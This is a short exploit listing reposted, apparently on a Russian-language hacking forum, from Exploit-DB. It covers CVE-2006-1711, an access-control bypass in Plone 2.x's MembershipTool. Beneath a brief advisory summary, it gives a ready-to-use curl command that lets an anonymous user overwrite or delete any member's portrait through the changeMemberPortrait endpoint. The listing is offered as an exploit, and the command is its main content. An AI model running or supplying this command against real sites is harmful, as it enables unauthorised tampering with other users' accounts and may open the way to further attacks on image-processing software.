Exploit Plone 2.x - MembershipTool Access Control Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27630
Проверка EDB
  1. Пройдено
Автор
MJ0011
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2006-1711
Дата публикации
2006-04-12
Код:
source: https://www.securityfocus.com/bid/17484/info

Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods.

This issue allows remote, anonymous attackers to modify and delete portrait images of members. This may help attackers exploit latent vulnerabilities in image-rendering software. Other attacks may also be possible.

curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
 
Источник
www.exploit-db.com

Похожие темы